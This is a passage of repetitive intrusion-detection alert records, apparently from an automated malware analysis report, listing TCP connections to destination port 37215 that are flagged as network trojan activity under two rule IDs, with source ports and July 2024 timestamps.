                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237897
                  SID:2829579
                  Source Port:57552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854243
                  SID:2829579
                  Source Port:34970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.687075
                  SID:2835222
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2835222
                  Source Port:46290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997634
                  SID:2829579
                  Source Port:52110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831923
                  SID:2829579
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2829579
                  Source Port:43114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084652
                  SID:2835222
                  Source Port:34758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2835222
                  Source Port:59958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.977851
                  SID:2835222
                  Source Port:48054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.968872
                  SID:2829579
                  Source Port:50180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.768377
                  SID:2835222
                  Source Port:56702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.529678
                  SID:2835222
                  Source Port:56430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.035645
                  SID:2829579
                  Source Port:34388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2829579
                  Source Port:53836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.015604
                  SID:2835222
                  Source Port:45604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554172
                  SID:2829579
                  Source Port:45122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867172
                  SID:2835222
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.585181
                  SID:2829579
                  Source Port:60286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941527
                  SID:2829579
                  Source Port:39644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.951264
                  SID:2835222
                  Source Port:41630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.190112
                  SID:2835222
                  Source Port:42190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.349992
                  SID:2835222
                  Source Port:49282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.322147
                  SID:2835222
                  Source Port:60550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.537786
                  SID:2829579
                  Source Port:38632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.014549
                  SID:2835222
                  Source Port:38130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.888787
                  SID:2835222
                  Source Port:46640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2829579
                  Source Port:56982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2835222
                  Source Port:55566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2835222
                  Source Port:47498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753086
                  SID:2835222
                  Source Port:50808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905026
                  SID:2835222
                  Source Port:44986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.981155
                  SID:2835222
                  Source Port:55830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.167933
                  SID:2829579
                  Source Port:34354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879798
                  SID:2835222
                  Source Port:36038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853209
                  SID:2835222
                  Source Port:41648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.391790
                  SID:2835222
                  Source Port:54542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369719
                  SID:2835222
                  Source Port:37312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.812412
                  SID:2835222
                  Source Port:43294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.651509
                  SID:2829579
                  Source Port:48496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.394204
                  SID:2835222
                  Source Port:40688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.528287
                  SID:2835222
                  Source Port:36760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.839511
                  SID:2829579
                  Source Port:55814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.814052
                  SID:2829579
                  Source Port:36122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.529010
                  SID:2835222
                  Source Port:40330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.450193
                  SID:2835222
                  Source Port:60730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.880494
                  SID:2835222
                  Source Port:47480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662909
                  SID:2835222
                  Source Port:58502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.425783
                  SID:2835222
                  Source Port:34246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647852
                  SID:2829579
                  Source Port:36138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.938789
                  SID:2829579
                  Source Port:39672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156857
                  SID:2835222
                  Source Port:56356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328619
                  SID:2835222
                  Source Port:37174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.786770
                  SID:2829579
                  Source Port:41746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997634
                  SID:2835222
                  Source Port:36812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421781
                  SID:2829579
                  Source Port:44900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.898333
                  SID:2835222
                  Source Port:53778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.210866
                  SID:2829579
                  Source Port:58640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.429606
                  SID:2835222
                  Source Port:54738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.721155
                  SID:2829579
                  Source Port:45180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.153820
                  SID:2835222
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.054322
                  SID:2829579
                  Source Port:36354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614916
                  SID:2835222
                  Source Port:37002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824393
                  SID:2829579
                  Source Port:39412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.657742
                  SID:2835222
                  Source Port:39008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595631
                  SID:2835222
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.627051
                  SID:2835222
                  Source Port:42530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.309785
                  SID:2835222
                  Source Port:52924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.016670
                  SID:2835222
                  Source Port:47346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007894
                  SID:2829579
                  Source Port:53736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443294
                  SID:2835222
                  Source Port:46628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.134892
                  SID:2835222
                  Source Port:53320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009015
                  SID:2835222
                  Source Port:46284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.813541
                  SID:2835222
                  Source Port:52692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.045782
                  SID:2835222
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.330211
                  SID:2829579
                  Source Port:51572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.161022
                  SID:2835222
                  Source Port:39582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.393096
                  SID:2835222
                  Source Port:44612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854802
                  SID:2835222
                  Source Port:53730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.482034
                  SID:2835222
                  Source Port:40854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.371632
                  SID:2829579
                  Source Port:46388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.631742
                  SID:2829579
                  Source Port:37796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.543257
                  SID:2829579
                  Source Port:44880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.754191
                  SID:2835222
                  Source Port:47166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734859
                  SID:2835222
                  Source Port:35928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.455188
                  SID:2835222
                  Source Port:50810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.994368
                  SID:2835222
                  Source Port:43556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.173254
                  SID:2829579
                  Source Port:42408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.515312
                  SID:2829579
                  Source Port:37966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204565
                  SID:2835222
                  Source Port:37816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.251231
                  SID:2829579
                  Source Port:49276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831289
                  SID:2835222
                  Source Port:39500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323465
                  SID:2835222
                  Source Port:33614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:48244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994858
                  SID:2835222
                  Source Port:56028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.864771
                  SID:2829579
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.920387
                  SID:2829579
                  Source Port:57348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.551619
                  SID:2829579
                  Source Port:41578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2835222
                  Source Port:34054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.975524
                  SID:2835222
                  Source Port:44926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.878882
                  SID:2835222
                  Source Port:41564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.104096
                  SID:2829579
                  Source Port:49720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.466887
                  SID:2835222
                  Source Port:49594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.990229
                  SID:2829579
                  Source Port:43204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.722958
                  SID:2829579
                  Source Port:45712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2835222
                  Source Port:40716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.807023
                  SID:2835222
                  Source Port:36114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2829579
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.728231
                  SID:2829579
                  Source Port:49306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.775656
                  SID:2829579
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.860909
                  SID:2829579
                  Source Port:35782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854802
                  SID:2835222
                  Source Port:52872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.365413
                  SID:2829579
                  Source Port:38876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.443161
                  SID:2829579
                  Source Port:54182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:52746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880668
                  SID:2835222
                  Source Port:38910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.831621
                  SID:2835222
                  Source Port:54106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525521
                  SID:2829579
                  Source Port:45904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.102101
                  SID:2835222
                  Source Port:45730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.066193
                  SID:2835222
                  Source Port:33424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.848212
                  SID:2829579
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.540257
                  SID:2835222
                  Source Port:43136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.135753
                  SID:2829579
                  Source Port:51252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480663
                  SID:2829579
                  Source Port:44610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026878
                  SID:2835222
                  Source Port:53950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.301991
                  SID:2835222
                  Source Port:46112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350374
                  SID:2835222
                  Source Port:35970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.910325
                  SID:2835222
                  Source Port:56216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.078172
                  SID:2829579
                  Source Port:39956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.852071
                  SID:2829579
                  Source Port:46684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.961510
                  SID:2835222
                  Source Port:57046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.977821
                  SID:2829579
                  Source Port:43122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.743244
                  SID:2835222
                  Source Port:44762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:34824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.421188
                  SID:2829579
                  Source Port:59848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810849
                  SID:2835222
                  Source Port:57440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355278
                  SID:2835222
                  Source Port:47848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713774
                  SID:2829579
                  Source Port:54556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777046
                  SID:2829579
                  Source Port:36066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121816
                  SID:2835222
                  Source Port:58196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811760
                  SID:2835222
                  Source Port:49386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008583
                  SID:2835222
                  Source Port:34248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392323
                  SID:2829579
                  Source Port:60128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.879132
                  SID:2829579
                  Source Port:53182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2835222
                  Source Port:38838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.092016
                  SID:2829579
                  Source Port:54824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169607
                  SID:2829579
                  Source Port:41534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.772375
                  SID:2835222
                  Source Port:38812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.159801
                  SID:2829579
                  Source Port:39890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.789365
                  SID:2829579
                  Source Port:45148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.239368
                  SID:2835222
                  Source Port:39892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.963360
                  SID:2835222
                  Source Port:45530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.450144
                  SID:2835222
                  Source Port:57006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.367080
                  SID:2835222
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.835000
                  SID:2835222
                  Source Port:53994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.966224
                  SID:2829579
                  Source Port:40476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.072701
                  SID:2829579
                  Source Port:48680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.976688
                  SID:2835222
                  Source Port:36450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249183
                  SID:2835222
                  Source Port:55180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.666113
                  SID:2829579
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155476
                  SID:2829579
                  Source Port:50808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.610519
                  SID:2829579
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469332
                  SID:2829579
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2835222
                  Source Port:56412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.624823
                  SID:2829579
                  Source Port:43206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.842183
                  SID:2829579
                  Source Port:44016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.778513
                  SID:2835222
                  Source Port:56880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.989466
                  SID:2829579
                  Source Port:41680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487883
                  SID:2829579
                  Source Port:50198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.529525
                  SID:2835222
                  Source Port:47048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2829579
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.819224
                  SID:2835222
                  Source Port:39206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.382964
                  SID:2829579
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.032433
                  SID:2835222
                  Source Port:60324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.498081
                  SID:2829579
                  Source Port:37140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752339
                  SID:2835222
                  Source Port:40498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823629
                  SID:2835222
                  Source Port:38652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312815
                  SID:2829579
                  Source Port:41058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422019
                  SID:2835222
                  Source Port:59616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.931783
                  SID:2829579
                  Source Port:45792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.835894
                  SID:2829579
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.836090
                  SID:2829579
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.755153
                  SID:2829579
